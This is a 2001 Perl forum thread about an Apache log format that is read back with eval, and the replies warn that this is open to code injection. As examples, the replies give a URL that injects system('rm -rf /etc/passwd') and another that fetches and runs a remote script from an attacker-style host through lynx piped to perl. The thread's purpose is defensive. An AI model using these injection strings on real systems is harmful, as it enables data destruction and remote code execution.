in reply to Perl readable Weblogs

Cool idea. Very dangerous though. Your choice of delimiter is not safe (and I don't think there is a safe one). Apache passes anything you type on the URL through. So sending the URL:

http://www.victim.com/trick'); system('rm -rf /etc/passwd'); ('

Would become:

(bytes=>'0',...,url=>'trick'); system('rm -rf /etc/passwd'); ('', ...)

Which I don't want someone to be able to run on my server.

From my brief reading of the BNF for valid URLs there are some invalid characters in URLs, such as ~, but Apache still writes out whatever it was given to the access log.

Also I doubt it is faster to eval each line of the log rather than making the log format something that can be split. I bet a regular expression match is faster than the eval, and it is certainly safer.

If you do decide to go with the split idea the following might work. Again you have to choose a good delimiter, but tacking the URL on the end means you can ignore it when choosing the delimiter by providing the number of fields to split. (Although I am not sure what request can contain so my choice of | as a delimiter may be invalid).

LogFormat "%b|%f|%h|%a|%l|%p|%P|%r|%s|%t|%T|%u|%v|%U log_perl

Then to read:

while (<LOGFILE>) { my %hash; %hash{bytes, filename, remotehost, remoteip, remoteuser, serverport, pid, request, status, time, timeserve, authuser, virtual, url) = split /\|/, $_, 13; # Use hash

-ben

Replies are listed 'Best First'.
Re^2: Perl readable Weblogs
by tadman (Prior) on Apr 19, 2001 at 01:22 UTC
    Although it is unlikely that the Apache user 'nobody' will be able to delete /etc/passwd (given as an example, of course), there are far more evil things that they can do, especially with e-commerce sites.

    Considering how much you can do with one line:    ...'); system('lynx --source http://www.hax.it/script.pl|perl'); (' You would be well advised to use a simple delimiter that doesn't require eval.
Re: Re: Perl readable Weblogs
by mr.nick (Chaplain) on Apr 19, 2001 at 21:24 UTC
    Ouch! Never thought of the eval issues (though I suppose Safe would help). Unfortunately, having the know the field names before hand goes against the intent. HOWEVER, the following should work well: LogFormat "bytes|%b|filename|%f|remotehost|%h|remoteip|%a|remoteuser|%l|serverport|%p|pid|%P|request|%r|status|%s|time|%t|timeserve|%T|authuser|%u|url|%U|virtual|%v" log_perl then parsing it with a
    while (<LOGFILE>) { my %hash=split /\|/,$_; ## do something with %hash ala $hash{time} or $hash{bytes} }
    should eliminate the nasty stuff.

      Hum, you still get hit with the escaping problem since you don't know how many |s to split so you have to pick something that is not going to be in the URL. I would put the url at the end anway, so if they got some odd characters into the log Your new approach is certainly safer since you won't get bitten by evaled code.

      As an aside, someone else noted that you couldn't remove /etc/passwd as nobody, but remember this is a log analysis tool that will be run by some user periodically.

      -ben